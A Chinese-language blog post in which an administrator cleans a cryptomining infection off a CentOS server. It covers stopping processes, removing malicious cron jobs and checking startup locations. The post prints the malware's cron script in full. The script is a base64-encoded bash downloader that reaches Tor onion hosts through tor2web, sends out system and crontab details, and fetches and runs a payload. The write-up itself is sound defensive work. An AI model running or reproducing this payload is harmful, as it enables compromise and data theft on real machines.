清除一次挖坑病毒
背景
新接手了個環境,同僚交接時說這些機器中過挖礦病毒還沒重裝,我TM。。。
線上環境不好動,隻能手動清除了。
作業系統如下:
[root@k8s-node7 ~]# cat /etc/redhat-release
CentOS Linux release 7.5.1804 (Core)
過程
ssh上去,ps -ef看到如下:
手動kill掉程序,很快會生成新的,猜測有守護程序。用STOP信号讓它停止。
[root@k8s-node7 ~]# kill -STOP 165224
[root@k8s-node7 ~]# kill -STOP 223135
檢視定時任務清理
[root@k8s-node7 ~]# crontab -l
8 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 ~]# cat /root/.systemd-service.sh
#!/bin/bash
exec &>/dev/null
echo tndtCwuLieAr5wvPgknqmFZpHZWrMf+G9UhUYqmI2z2sX3NaL+fIvmN+PKEvAKMk
echo dG5kdEN3dUxpZUFyNXd2UGdrbnFtRlpwSFpXck1mK0c5VWhVWXFtSTJ6MnNYM05hTCtmSXZtTitQS0V2QUtNawpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJpNjJobW56dGZwendyaGpnMzRtNnJ1eGVtNW9lMzZudWx6bXhjZ2JkYmtpYWNldWJwcmt0YTdhZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0IG9uaW9uLmZvdW5kYXRpb24gb25pb24uY29tLmRlIG9uaW9uLnNoIHRvcjJ3ZWIuc3UgdG9yMndlYi5pbwpkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
[root@k8s-node7 ~]# rm -f !$
rm -f /root/.systemd-service.sh
然後繼續清理
/var/spoon/cron/
,
/etc/crontab
,
/etc/cron*
等目錄或檔案,
[root@k8s-node7 crontabs]# cd /etc/cron.d
[root@k8s-node7 cron.d]# ls
0systemd-service
[root@k8s-node7 cron.d]# cat 0systemd-service
9 * * * * root /opt/systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 cron.d]# pwd
/etc/cron.d
[root@k8s-node7 cron.d]# rm -f 0systemd-service
[root@k8s-node7 ~]# ll -d /etc/cron.*
drwxr-xr-x. 2 root root 4096 3月 10 11:01 /etc/cron.d
drwxr-xr-x. 2 root root 4096 12月 18 15:31 /etc/cron.daily
-rw-------. 1 root root 0 4月 11 2018 /etc/cron.deny
drwxr-xr-x. 2 root root 4096 9月 25 2019 /etc/cron.hourly
drwxr-xr-x. 2 root root 4096 6月 10 2014 /etc/cron.monthly
drwxr-xr-x. 2 root root 4096 6月 10 2014 /etc/cron.weekly
[root@k8s-node7 ~]# ll -d /etc/cron.*/*
-rwx------. 1 root root 219 4月 11 2018 /etc/cron.daily/logrotate
-rwxr-xr-x. 1 root root 392 4月 11 2018 /etc/cron.hourly/0anacron
-rwxr-xr-x. 1 root root 191 4月 11 2018 /etc/cron.hourly/mcelog.cron
同時檢查開機啟動目錄等,一一清理,這時候把之前STOP的程序kill掉,觀察一段時間,看看是否還會自啟。
